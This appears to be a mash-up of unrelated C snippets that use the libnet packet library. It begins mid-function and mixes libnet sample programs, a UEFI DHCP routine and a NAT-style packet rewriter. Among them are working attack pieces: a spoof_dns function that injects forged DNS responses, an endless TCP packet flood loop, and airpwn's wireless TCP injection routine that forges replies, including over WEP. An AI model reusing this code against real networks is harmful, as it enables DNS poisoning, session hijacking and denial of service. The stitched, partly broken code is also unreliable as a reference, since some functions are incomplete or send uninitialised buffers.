/* protocol tag to modify an existing header, 0 to build a new one */ ); if (eth_tag == -1) { printf("libnet_build_ethernet failure\n"); return (-5); }; for(;;) { packet_size = libnet_write(handle); /* packet out */ //printf("%d\n", packet_size); printf("sending TCP packet!\n"); //usleep(1); } libnet_destroy(handle); /* release the handler */ return (0); }
/* Build the new packet and inject it */ void spoof_dns(char *device) { // printf("Common Dude!"); struct in_addr src, dst, spoof; /* For printing addresses */ int inject_size; /* Number of bytes of injected packet */ int packet_size; /* Size of the packet */ int i; /* misc */ u_char *packet; /* Packet to be built */ libnet_t *handler; /* Libnet handler */ libnet_ptag_t dns, tcp, udp, ip; /* Libnet ptags */ char errbuf[LIBNET_ERRBUF_SIZE]; /* Error buffer */ packet_size = spoofpacket.payload_size + LIBNET_IPV4_H + LIBNET_UDP_H + LIBNET_DNS_H; /* Open a raw socket */ handler = libnet_init(LIBNET_RAW4, device, errbuf); if (handler == NULL) { printf("Error opening a socket: %s\n", errbuf); exit(1); } /* DNS header construction */ dns = 0; udp = 0; tcp = 0; ip = 0; /*****************************************************/ /******* USE: libnet to construct DNS header here ****/ /*****************************************************/ libnet_build_dnsv4 ( LIBNET_UDP_DNSV4_H, spoofpacket.dns_id, 0x8180, 1, 1, 0, 0, spoofpacket.payload, //insert payload spoofpacket.payload_size, //36 //insert length handler, dns ); if (dns == -1) { printf("Building DNS header failed: %s\n", libnet_geterror(handler)); exit(1); } // printf("DST PORT: %d\n", spoofpacket.dst_port); // printf("SRC PORT: %d\n", spoofpacket.src_port); //printf("UDP Data: %d\n", spoofpacket.payload_size); /* UDP header construction */ /*** Use libnet to construct UDP header here **/ libnet_build_udp ( spoofpacket.dst_port, spoofpacket.src_port, spoofpacket.payload_size + LIBNET_DNS_H + LIBNET_UDP_H, // 36 + 12 + 8 0, //insert UDP checksum. have to check later NULL, //insert payload 0, //insert lenghth handler, udp ); if (udp ==-1) { printf("Building UDP header failed: %s\n", libnet_geterror(handler)); exit(1); } /* IP header construction */ /*****************************************************/ /******* USE: libnet to construct IP header here ****/ /*****************************************************/ libnet_build_ipv4 ( packet_size, //56 + 20 0, 6888, //libnet_get_prand (LIBNET_PRu16) 0, 127, IPPROTO_UDP, 0, ////insert IP checksum value. have to check later spoofpacket.dst_address, spoofpacket.src_address, NULL, //insert payload 0, //insert length handler, ip ); //Remember, all length can be debatable if (ip == -1) { printf("Building IP header failed: %s\n", libnet_geterror(handler)); exit(1); } /* Calculate checksum */ /****** USE: libnet function to generate checksum*******/ /*******************************************************/ /* Inject the packet */ /*******************************************************/ inject_size = libnet_write(handler); //printf("Inject: %d\n", inject_size); if (inject_size == -1) { printf("Write failed: %s\n", libnet_geterror(handler)); } printf("--- Spoofed DNS Response injected ---\n\n"); /* Destroy the packet */ /*******************************************************/ /**************** USE: libnet_destroy() ****************/ /*******************************************************/ libnet_destroy(handler); }
int main(int argc, char *argv[]) { char c; u_long src_ip = 0, dst_ip = 0; u_short type = LIBNET_UDP_DNSV4_H; libnet_t *l; libnet_ptag_t ip; libnet_ptag_t ptag4; /* TCP or UDP ptag */ libnet_ptag_t dns; char errbuf[LIBNET_ERRBUF_SIZE]; char *query = NULL; char payload[1024]; u_short payload_s; printf("libnet 1.1 packet shaping: DNSv4[raw]\n"); /* * Initialize the library. Root priviledges are required. */ l = libnet_init( LIBNET_RAW4, /* injection type */ NULL, /* network interface */ errbuf); /* error buffer */ if (!l) { fprintf(stderr, "libnet_init: %s", errbuf); exit(EXIT_FAILURE); } /* * parse options */ while ((c = getopt(argc, argv, "d:s:q:t")) != EOF) { switch (c) { case 'd': if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad destination IP address: %s\n", optarg); exit(EXIT_FAILURE); } break; case 's': if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad source IP address: %s\n", optarg); exit(EXIT_FAILURE); } break; case 'q': query = optarg; break; case 't': type = LIBNET_TCP_DNSV4_H; break; default: exit(EXIT_FAILURE); } } if (!src_ip) { src_ip = libnet_get_ipaddr4(l); } if (!dst_ip || !query) { usage(argv[0]); exit(EXIT_FAILURE); } /* * build dns payload */ payload_s = snprintf(payload, sizeof payload, "%c%s%c%c%c%c%c", (char)(strlen(query)&0xff), query, 0x00, 0x00, 0x01, 0x00, 0x01); /* * build packet */ dns = libnet_build_dnsv4( type, /* TCP or UDP */ 0x7777, /* id */ 0x0100, /* request */ 1, /* num_q */ 0, /* num_anws_rr */ 0, /* num_auth_rr */ 0, /* num_addi_rr */ payload, payload_s, l, 0 ); if (dns == -1) { fprintf(stderr, "Can't build DNS packet: %s\n", libnet_geterror(l)); goto bad; } if (type == LIBNET_TCP_DNSV4_H) /* TCP DNS */ { ptag4 = libnet_build_tcp( 0x6666, /* source port */ 53, /* destination port */ 0x01010101, /* sequence number */ 0x02020202, /* acknowledgement num */ TH_PUSH|TH_ACK, /* control flags */ 32767, /* window size */ 0, /* checksum */ 0, /* urgent pointer */ LIBNET_TCP_H + LIBNET_TCP_DNSV4_H + payload_s, /* TCP packet size */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (ptag4 == -1) { fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l)); goto bad; } ip = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_TCP_H + type + payload_s,/* length */ 0, /* TOS */ 242, /* IP ID */ 0, /* IP Frag */ 64, /* TTL */ IPPROTO_TCP, /* protocol */ 0, /* checksum */ src_ip, /* source IP */ dst_ip, /* destination IP */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (ip == -1) { fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l)); exit(EXIT_FAILURE); } } else /* UDP DNS */ { ptag4 = libnet_build_udp( 0x6666, /* source port */ 53, /* destination port */ LIBNET_UDP_H + LIBNET_UDP_DNSV4_H + payload_s, /* packet length */ 0, /* checksum */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (ptag4 == -1) { fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l)); goto bad; } ip = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_UDP_H + type + payload_s,/* length */ 0, /* TOS */ 242, /* IP ID */ 0, /* IP Frag */ 64, /* TTL */ IPPROTO_UDP, /* protocol */ 0, /* checksum */ src_ip, /* source IP */ dst_ip, /* destination IP */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (ip == -1) { fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l)); exit(EXIT_FAILURE); } } /* * write to the wire */ c = libnet_write(l); if (c == -1) { fprintf(stderr, "Write error: %s\n", libnet_geterror(l)); goto bad; } else { fprintf(stderr, "Wrote %d byte DNS packet; check the wire.\n", c); } libnet_destroy(l); return (EXIT_SUCCESS); bad: libnet_destroy(l); return (EXIT_FAILURE); }
void configure_net_dhcp() { kprintf("k_network: configure_net_dhcp() - attempting DHCP configuration\n"); kprintf("k_network: configure_net_dhcp() - building DHCP request\n"); EFI_SIMPLE_NETWORK_MODE *m = simple_net->Mode; int i = 0; u_char options_req[] = { LIBNET_DHCP_SUBNETMASK, LIBNET_DHCP_BROADCASTADDR, LIBNET_DHCP_TIMEOFFSET, LIBNET_DHCP_ROUTER, LIBNET_DHCP_DOMAINNAME, LIBNET_DHCP_DNS, LIBNET_DHCP_HOSTNAME }; u_char *options; libnet_t *l; char* err_buf; l = libnet_init(LIBNET_NONE,NULL,err_buf); if(!l) { kprintf("libnet_init: %s\n", err_buf); } kprintf("k_network: configure_net_dhcp() - libnet setup\n"); u_long options_len = 3; libnet_ptag_t dhcp_packet; libnet_ptag_t udp_packet; libnet_ptag_t ip_packet; options = malloc(3); options[i++] = LIBNET_DHCP_MESSAGETYPE; options[i++] = 1; options[i++] = LIBNET_DHCP_MSGDISCOVER; u_long orig_len = options_len; options_len += sizeof(options_req) + 2; u_char *tmp = malloc(options_len); memcpy(tmp, options, orig_len); free(options); options = tmp; options[i++] = LIBNET_DHCP_PARAMREQUEST; options[i++] = sizeof(options_req); memcpy(options + i, options_req, sizeof(options_req)); i += sizeof(options_req); orig_len = options_len; options_len += 1; tmp = malloc(options_len); memcpy(tmp, options, orig_len); free(options); options = tmp; options[i++] = LIBNET_DHCP_END; if (options_len + LIBNET_DHCPV4_H < LIBNET_BOOTP_MIN_LEN) { orig_len = options_len; options_len = LIBNET_BOOTP_MIN_LEN - LIBNET_DHCPV4_H; tmp = malloc(options_len); memcpy(tmp, options, orig_len); free(options); options = tmp; memset(options + i, 0, options_len - i); } dhcp_packet = libnet_build_dhcpv4( LIBNET_DHCP_REQUEST, /* opcode */ 1, /* hardware type */ 6, /* hardware address length */ 0, /* hop count */ 0xdeadbeef, /* transaction id */ 0, /* seconds since bootstrap */ 0x8000, /* flags */ 0, /* client ip */ 0, /* your ip */ 0, /* server ip */ 0, /* gateway ip */ m->CurrentAddress.Addr, /* client hardware addr */ NULL, /* server host name */ NULL, /* boot file */ options, /* dhcp options in payload */ options_len, /* length of options */ l, /* libnet context */ 0); /* libnet ptag */ udp_packet = libnet_build_udp( 68, /* source port */ 67, /* destination port */ LIBNET_UDP_H + LIBNET_DHCPV4_H + options_len, /* packet size */ 0, /* checksum */ NULL, /* payload */ 0, /* payload size */ l, /* libnet context */ 0); /* libnet ptag */ ip_packet = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_UDP_H + LIBNET_DHCPV4_H + options_len, /* length */ 0x10, /* TOS */ 0, /* IP ID */ 0, /* IP Frag */ 16, /* TTL */ IPPROTO_UDP, /* protocol */ 0, /* checksum */ 0, /* src ip */ 0, /* destination ip */ NULL, /* payload */ 0, /* payload size */ l, /* libnet context */ 0); /* libnet ptag */ uint32_t pack_size=0; uint8_t *pack; /* char _tx_buf[4096]; void* buf = (void*)_tx_buf; memset(buf,0,4096); // UINTN pack_size = sizeof(struct dhcp_msg); UINTN pack_size=0; // EFI_PXE_BASE_CODE_DHCPV4_PACKET *dhcp_req = (EFI_PXE_BASE_CODE_DHCPV4_PACKET*)malloc(sizeof(EFI_PXE_BASE_CODE_DHCPV4_PACKET)); struct dhcp_msg *dhcp_req = (struct dhcp_msg*)(buf +(m->MediaHeaderSize)+ (sizeof(struct iphdr) + sizeof(struct udphdr))); uint64_t req_id = (uint64_t)rand(); int i=0; memset((void*)dhcp_req,0,pack_size); dhcp_req->op = 1; // request dhcp_req->htype = m->IfType; dhcp_req->hlen = m->HwAddressSize; dhcp_req->hops = 0; dhcp_req->xid = req_id; dhcp_req->secs = 0; dhcp_req->flags = 0x8000; for(i=0; i< m->HwAddressSize; i++) { dhcp_req->chaddr[i] = m->CurrentAddress.Addr[i]; } dhcp_req->cookie = 0x63825363; dhcp_req->options[0] = 53; dhcp_req->options[1] = 1; dhcp_req->options[2] = 1; kprintf("k_network: configure_net_dhcp() ID is %#llx\n",req_id); struct iphdr *iph = (struct iphdr *)(buf+(m->MediaHeaderSize)); struct udphdr *udph = (struct udphdr *) (buf + sizeof (struct iphdr)+(m->MediaHeaderSize)); memset((void*)iph,0,sizeof(struct iphdr)); // memset((void*)udph,0,sizeof(struct udph)); iph->ihl = 5; iph->version = 4; iph->tot_len = htons(sizeof(struct iphdr)); iph->protocol = IPPROTO_UDP; iph->ttl = 255; iph->saddr = INADDR_ANY; iph->daddr = INADDR_ANY; // iph->check = csum ((unsigned short *) buf, iph->tot_len); // udph->uh_ulen = sizeof(struct udphdr) + pack_size; // udph->uh_sum = csum((unsigned short*)(buf - sizeof(struct udphdr)),pack_size+sizeof(struct udphdr)); // udph->uh_sport = 68; // udph->uh_dport = 68;*/ EFI_MAC_ADDRESS anywhere; for(i=0; i< m->HwAddressSize; i++) { anywhere.Addr[i] = 255; } kprintf("k_network:configure_net_dhcp() - Transmitting request\n"); UINT16 ether_type = 0x800; // EFI_STATUS send_s = simple_net->Transmit(simple_net,0,tx_size,buf,NULL,&anywhere,ðer_type); EFI_STATUS send_s = simple_net->Transmit(simple_net,m->MediaHeaderSize,pack_size,(void*)pack,NULL,&anywhere,ðer_type); kprintf("k_network:configure_net_dhcp() - Waiting for transmission\n"); void* tx_buf=NULL; while(tx_buf==NULL && (send_s==0)) { tx_buf=NULL; send_s = simple_net->GetStatus(simple_net,0,&tx_buf); if(send_s != 0) kprintf("!\n"); } kprintf("k_network:configure_net_dhcp() - Transmitted, tx_buf at %#llx \n",tx_buf); }
int main(int argc, char *argv[]) { int c; char *cp; libnet_t *l; libnet_ptag_t t; char *payload; u_short payload_s; u_long src_ip, dst_ip; u_short src_prt, dst_prt; char errbuf[LIBNET_ERRBUF_SIZE]; printf("libnet 1.1 packet shaping: TCP (over FDDI) [link]\n"); /* * Initialize the library. Root priviledges are required. * * Currently hardcoded for fddi0. */ l = libnet_init( LIBNET_LINK, /* injection type */ "fddi0", /* network interface */ errbuf); /* error buffer */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(EXIT_FAILURE); } src_ip = 0; dst_ip = 0; src_prt = 0; dst_prt = 0; payload = NULL; payload_s = 0; while ((c = getopt(argc, argv, "d:s:p:")) != EOF) { switch (c) { /* * We expect the input to be of the form `ip.ip.ip.ip.port`. We * point cp to the last dot of the IP address/port string and * then seperate them with a NULL byte. The optarg now points to * just the IP address, and cp points to the port. */ case 'd': if (!(cp = strrchr(optarg, '.'))) { usage(argv[0]); } *cp++ = 0; dst_prt = (u_short)atoi(cp); if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad destination IP address: %s\n", optarg); exit(EXIT_FAILURE); } break; case 's': if (!(cp = strrchr(optarg, '.'))) { usage(argv[0]); } *cp++ = 0; src_prt = (u_short)atoi(cp); if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad source IP address: %s\n", optarg); exit(EXIT_FAILURE); } break; case 'p': payload = optarg; payload_s = strlen(payload); break; default: exit(EXIT_FAILURE); } } if (!src_ip || !src_prt || !dst_ip || !dst_prt) { usage(argv[0]); exit(EXIT_FAILURE); } t = libnet_build_tcp( src_prt, /* source port */ dst_prt, /* destination port */ 0x01010101, /* sequence number */ 0x02020202, /* acknowledgement num */ TH_SYN, /* control flags */ 32767, /* window size */ 0, /* checksum */ 0, /* urgent pointer */ LIBNET_TCP_H + payload_s, /* TCP packet size */ payload, /* payload */ payload_s, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l)); goto bad; } t = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_TCP_H + payload_s, /* length */ 0, /* TOS */ 242, /* IP ID */ 0, /* IP Frag */ 64, /* TTL */ IPPROTO_TCP, /* protocol */ 0, /* checksum */ src_ip, /* source IP */ dst_ip, /* destination IP */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l)); goto bad; } t = libnet_build_fddi( LIBNET_FDDI_FC_REQD | 0x04, /* Asynch LLC - priority 4 */ fddi_dst, /* fddi destination */ fddi_src, /* fddi source */ LIBNET_SAP_SNAP, /* DSAP -> SNAP encap */ LIBNET_SAP_SNAP, /* SSAP -> SNAP encap */ 0x03, /* Unnumbered info/frame */ org_code, /* Organization Code */ FDDI_TYPE_IP, /* protocol type */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build fddi header: %s\n", libnet_geterror(l)); goto bad; } /* * Write it to the wire. */ c = libnet_write(l); if (c == -1) { fprintf(stderr, "Write error: %s\n", libnet_geterror(l)); goto bad; } else { fprintf(stderr, "Wrote %d byte TCP packet; check the wire.\n", c); } libnet_destroy(l); return (EXIT_SUCCESS); bad: libnet_destroy(l); return (EXIT_FAILURE); }
void create_tcp_packet(struct tcphdr2 *tcp,struct ip* ip, int size_payload,const u_char* packet){ char errbuf[LIBNET_ERRBUF_SIZE]; libnet_ptag_t tag=0,tag_tcp=0,ipv=0; /* libnet protocol block */ libnet_t * libnet_context; int set=0; int port_out,port_in; char* payload ; if(!strcmp("192.168.1.3",inet_ntoa(ip->ip_src)))set=1; else set=2; if(set==1){ libnet_context = libnet_init(LIBNET_RAW4,"eth0", errbuf); port_out=check_out(ntohs(tcp->source)); } else{ libnet_context = libnet_init(LIBNET_RAW4,"eth1", errbuf); //if(ntohs(tcp->dest)!=9999){exit(0);} port_in=check_in(ntohs(tcp->dest)); if(!port_in)return;//exit(0);return;} } if (libnet_context == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(1); } fprintf(stderr, "libnet_init() seccess\n"); payload=(char*) (packet+54); char* flags=(char*)(tcp+13); if((tcp->doff)*4 > 20) { fprintf(stderr, "(tcp->doff)*4 > 20\n"); if(libnet_build_tcp_options(/*(u_int8_t *)(tcp+20)*/(u_int8_t *)packet+54,(tcp->doff)*4 -20,libnet_context,0)==-1) { printf("tcp_option error\n\n"); } //payload=(char*)( packet+(tcp->doff)*4-20+54); printf("tcp_option\n"); } fprintf(stderr, "libnet_init() seccess2\n"); if (size_payload == 0) payload = NULL; if(set==1){ // port_test=ntohs(tcp->source); tag_tcp = libnet_build_tcp ( //ntohs(tcp->source), /* src port */ //9999, port_out, ntohs(tcp->dest), /* destination port */ ntohl(tcp->seq), /* sequence number */ ntohl(tcp->ack_seq), /* acknowledgement */ tcp->th_flags, //(*flags), /* control flags */ ntohs(tcp->window), /* window */ 0 , /* checksum - 0 = autofill */ ntohs(tcp->urg_ptr), /* urgent */ (tcp->doff)*4+size_payload, /* total tcp size */ payload, /* payload */ size_payload, /* payload length */ libnet_context, /* libnet context */ tag); /* protocol tag */ } else{ tag_tcp = libnet_build_tcp ( ntohs(tcp->source), /* src port */ //ntohs(tcp->dest), /* destination port */ port_in, //port_test, ntohl(tcp->seq), /* sequence number */ ntohl(tcp->ack_seq), /* acknowledgement */ tcp->th_flags, /* control flags */ ntohs(tcp->window), /* window */ 0 , /* checksum - 0 = autofill */ ntohs(tcp->urg_ptr), /* urgent */ (tcp->doff)*4+size_payload, /* total tcp size */ payload, /* payload */ size_payload, /* payload length */ libnet_context, /* libnet context */ tag); } if (tag_tcp == -1) { fprintf (stderr, "Unable to build TCP header: %s\n", libnet_geterror (libnet_context)); exit (1); } //libnet_do_checksum(&libnet_context,tcp,IPPROTO_TCP,(tcp->doff)); fprintf (stderr,"tcp_build OK\n"); struct in_addr* tmp_src = &ip->ip_src; struct in_addr* tmp_dst = &ip->ip_dst; if(set==1){ ipv = libnet_build_ipv4( ntohs(ip->ip_len), /* length */ (ip->ip_tos), /* TOS */ ntohs(ip->ip_id), /* IP ID */ ntohs(ip->ip_off), /* IP Frag */ (ip->ip_ttl), /* TTL */ (ip->ip_p), /* protocol */ //IPPROTO_TCP, 0, /* checksum */ libnet_name2addr4(libnet_context,"140.114.195.31",LIBNET_DONT_RESOLVE), *((u_int32_t*)(tmp_dst)), /* destination IP */ //libnet_name2addr4(libnet_context,"192.168.1.3",LIBNET_DONT_RESOLVE), // *((u_int32_t*)(tmp_src)), /*src IP*/ NULL, /* payload */ 0, /* payload size */ libnet_context, /* libnet context */ tag); /* ptag */ }else if(set==2){ ipv = libnet_build_ipv4( ntohs(ip->ip_len), /* length */ (ip->ip_tos), /* TOS */ ntohs(ip->ip_id), /* IP ID */ ntohs(ip->ip_off), /* IP Frag */ (ip->ip_ttl), /* TTL */ (ip->ip_p), /* protocol */ //IPPROTO_TCP, 0, /* checksum */ // libnet_name2addr4(libnet_context,"192.168.1.0",LIBNET_DONT_RESOLVE), *((u_int32_t*)(tmp_src)), /*src IP*/ libnet_name2addr4(libnet_context,"192.168.1.3",LIBNET_DONT_RESOLVE), //*((u_int32_t*)(tmp_dst)), /* destination IP */ NULL, /* payload */ 0, /* payload size */ libnet_context, /* libnet context */ tag); } else { printf("error iph\n");exit(0); } if (ipv == -1) { fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(libnet_context)); } if (set==1) { //flag为1,带表从内网到外网,目的MAC:gateway 源MAC:localMACw libnet_build_ethernet( gatewayMAC, /* ethernet destination */ LOCAL_MAC_OUTTER, /* ethernet source */ ETHERTYPE_IP, /* protocol type */ NULL, /* payload */ 0, /* payload size */ libnet_context, /* libnet handle */ 0); /* libnet id */ } else { //flag为0,代表从外网到内网,目的MAC:targetMAC 源MAC:localMACn libnet_build_ethernet( targetMAC, /* ethernet destination */ LOCAL_MAC_INNER, /* ethernet source */ ETHERTYPE_IP, /* protocol type */ NULL, /* payload */ 0, /* payload size */ libnet_context, /* libnet handle */ 0); /* libnet id */ } if (libnet_write(libnet_context) == -1) fprintf(stderr, "Write error: %s\n", libnet_geterror(libnet_context)); fprintf(stderr, "Send %u\n",(u_int16_t)tcp->doff); libnet_clear_packet(libnet_context); libnet_destroy(libnet_context); }
/** * Function to inject TCP packets to the wireless interface. Requires headers * from a TO_DS packet for use in crafting the FROM_DS response. */ void inject_tcp(airpwn_ctx *ctx, ieee80211_hdr *w_hdr, struct iphdr *ip_hdr, struct tcphdr *tcp_hdr, uint8_t *wepkey, uint32_t keylen, char *content, uint32_t contentlen, uint8_t tcpflags, uint32_t *seqnum) { // libnet wants the data in host-byte-order u_int ack = ntohl(tcp_hdr->seq) + ( ntohs(ip_hdr->tot_len) - ip_hdr->ihl * 4 - tcp_hdr->doff * 4 ); ctx->tcp_t = libnet_build_tcp( ntohs(tcp_hdr->dest), // source port ntohs(tcp_hdr->source), // dest port *seqnum, // sequence number ack, // ack number tcpflags, // flags 0xffff, // window size 0, // checksum 0, // urg ptr 20 + contentlen, // total length of the TCP packet (uint8_t*)content, // response contentlen, // response_length ctx->lnet, // libnet_t pointer ctx->tcp_t // ptag ); if(ctx->tcp_t == -1){ printf("libnet_build_tcp returns error: %s\n", libnet_geterror(ctx->lnet)); return; } ctx->ip_t = libnet_build_ipv4( 40 + contentlen, // length 0, // TOS bits 1, // IPID (need to calculate) 0, // fragmentation 0xff, // TTL 6, // protocol 0, // checksum ip_hdr->daddr, // source address ip_hdr->saddr, // dest address NULL, // response 0, // response length ctx->lnet, // libnet_t pointer ctx->ip_t // ptag ); if(ctx->ip_t == -1){ printf("libnet_build_ipv4 returns error: %s\n", libnet_geterror(ctx->lnet)); return; } // copy the libnet packets to to a buffer to send raw.. unsigned char packet_buff[0x10000]; memcpy(packet_buff, w_hdr, IEEE80211_HDR_LEN); ieee80211_hdr *n_w_hdr = (ieee80211_hdr *)packet_buff; // set the FROM_DS flag and swap MAC addresses n_w_hdr->flags = IEEE80211_FROM_DS; if(wepkey) n_w_hdr->flags |= IEEE80211_WEP_FLAG; n_w_hdr->llc.type = LLC_TYPE_IP; uint8_t tmp_addr[6]; memcpy(tmp_addr, n_w_hdr->addr1, 6); memcpy(n_w_hdr->addr1, n_w_hdr->addr2, 6); memcpy(n_w_hdr->addr2, tmp_addr, 6); u_int32_t packet_len; u_int8_t *lnet_packet_buf; // cull_packet will dump the packet (with correct checksums) into a // buffer for us to send via the raw socket if(libnet_adv_cull_packet(ctx->lnet, &lnet_packet_buf, &packet_len) == -1){ printf("libnet_adv_cull_packet returns error: %s\n", libnet_geterror(ctx->lnet)); return; } memcpy(packet_buff + IEEE80211_HDR_LEN, lnet_packet_buf, packet_len); libnet_adv_free_packet(ctx->lnet, lnet_packet_buf); // total packet length int len = IEEE80211_HDR_LEN + 40 + contentlen; if(wepkey){ uint8_t tmpbuf[0x10000]; /* encryption starts after the 802.11 header, but the LLC header * gets encrypted. */ memcpy(tmpbuf, packet_buff+IEEE80211_HDR_LEN_NO_LLC, len-IEEE80211_HDR_LEN_NO_LLC); len = wep_encrypt(tmpbuf, packet_buff+IEEE80211_HDR_LEN_NO_LLC, len-IEEE80211_HDR_LEN_NO_LLC, wepkey, keylen); if(len <= 0){ fprintf(stderr, "Error performing WEP encryption!\n"); return; } else len += IEEE80211_HDR_LEN_NO_LLC; } /* Establish lorcon packet transmission structure */ ctx->in_packet.packet = packet_buff; ctx->in_packet.plen = len; /* Send the packet */ if (tx80211_txpacket(&ctx->inject_tx, &ctx->in_packet) < 0) { fprintf(stderr, "Unable to transmit packet."); perror("tx80211_txpacket"); return; } *seqnum += contentlen; //advance the sequence number printlog(ctx, 2, "wrote %d bytes to the wire(less)\n", len); }
// Sends an empty TCP segment with the specified parameters int sendEmptyTCPSegment( libnet_t *libnet_c, TcpSession *sess, u_int32_t seq, u_int32_t ack, u_int8_t control, NM_PacketDir dir ) { libnet_ptag_t tcp, ip, ethernet; tcp = ip = ethernet = 0; tcp = libnet_build_tcp( ( dir == ePacketDirFromClient ) ? sess->clientStream.port : ( config.cap[capindex]->dsslport ? config.cap[capindex]->dsslport: sess->serverStream.port ), /* source port */ ( dir == ePacketDirFromClient ) ? ( config.cap[capindex]->dsslport ? config.cap[capindex]->dsslport: sess->serverStream.port ) : sess->clientStream.port, /* destination port */ seq, /* sequence number */ ack, /* acknowledgement num */ control, /* control flags */ 32767, /* window size */ 0, /* checksum */ 10, /* urgent pointer */ LIBNET_TCP_H, /* TCP packet size */ NULL, /* payload */ 0, /* payload size */ libnet_c, /* libnet handle */ 0); /* libnet id */ if (tcp == -1) { if (config.daemon) syslog(LOG_ERR, "Can't build TCP header: %s", libnet_geterror(libnet_c)); else fprintf(stderr, "Can't build TCP header: %s.\n", libnet_geterror(libnet_c)); return( -1 ); } ip = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_TCP_H, /* length */ 0, /* TOS */ 54609, /* IP ID */ 0, /* IP Frag */ 64, /* TTL */ IPPROTO_TCP, /* protocol */ 0, /* checksum */ ( dir == ePacketDirFromClient ) ? sess->clientStream.ip_addr : sess->serverStream.ip_addr, /* source IP */ ( dir == ePacketDirFromClient ) ? sess->serverStream.ip_addr : sess->clientStream.ip_addr, /* destination IP */ NULL, /* payload */ 0, /* payload size */ libnet_c, /* libnet handle */ 0); /* libnet id */ if (ip == -1) { if (config.daemon) syslog(LOG_ERR, "Can't build IP header: %s", libnet_geterror(libnet_c)); else fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(libnet_c)); return( -1 ); } ethernet = libnet_build_ethernet( ( dir == ePacketDirFromClient ) ? config.cap[capindex]->dst_interface_mac : config.cap[capindex]->src_interface_mac, /* ethernet dest */ ( dir == ePacketDirFromClient ) ? config.cap[capindex]->src_interface_mac : config.cap[capindex]->dst_interface_mac, /* ethernet source */ ETHERTYPE_IP, /* protocol type */ NULL, /* payload */ 0, /* payload size */ libnet_c, /* libnet handle */ 0); /* libnet id */ if (ethernet == -1) { if (config.daemon) syslog(LOG_ERR, "Can't build ethernet header: %s", libnet_geterror(libnet_c)); else fprintf(stderr, "Can't build ethernet header: %s.\n", libnet_geterror(libnet_c)); return( -1 ); } if (libnet_write(libnet_c) == -1) { if (config.daemon) syslog(LOG_ERR, "write error: %s", libnet_geterror(libnet_c)); else fprintf(stderr, "Write error: %s.\n", libnet_geterror(libnet_c)); return( -1 ); } libnet_clear_packet(libnet_c); return( 1 ); }
int main(int argc, char **argv) { int c; libnet_t *l; libnet_ptag_t t; u_long src_ip, dst_ip; char errbuf[LIBNET_ERRBUF_SIZE]; printf("libnet 1.1 packet shaping: ICMP timestamp[raw]\n"); /* * Initialize the library. Root priviledges are required. */ l = libnet_init( LIBNET_RAW4, /* injection type */ NULL, /* network interface */ errbuf); /* errbuf */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(EXIT_FAILURE); } src_ip = 0; dst_ip = 0; while((c = getopt(argc, argv, "d:s:")) != EOF) { switch (c) { case 'd': if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad destination IP address: %s\n", optarg); exit(1); } break; case 's': if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad source IP address: %s\n", optarg); exit(1); } break; } } if (!src_ip || !dst_ip) { usage(argv[0]); exit(EXIT_FAILURE); } t = libnet_build_icmpv4_timestamp( ICMP_TSTAMP, /* type */ 0, /* code */ 0, /* checksum */ 242, /* id */ 424, /* sequence number */ 1000, /* otime */ 2000, /* rtime */ 3000, /* ttime */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); if (t == -1) { fprintf(stderr, "Can't build ICMP header: %s\n", libnet_geterror(l)); goto bad; } t = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_ICMPV4_TS_H, /* length */ 0, /* TOS */ 242, /* IP ID */ 0, /* IP Frag */ 64, /* TTL */ IPPROTO_ICMP, /* protocol */ 0, /* checksum */ src_ip, /* source IP */ dst_ip, /* destination IP */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); if (t == -1) { fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l)); goto bad; } /* * Write it to the wire. */ c = libnet_write(l); if (c == -1) { fprintf(stderr, "Write error: %s\n", libnet_geterror(l)); goto bad; } else { fprintf(stderr, "Wrote %d byte ICMP packet; check the wire.\n", c); } libnet_destroy(l); return (EXIT_SUCCESS); bad: libnet_destroy(l); return (EXIT_FAILURE); }
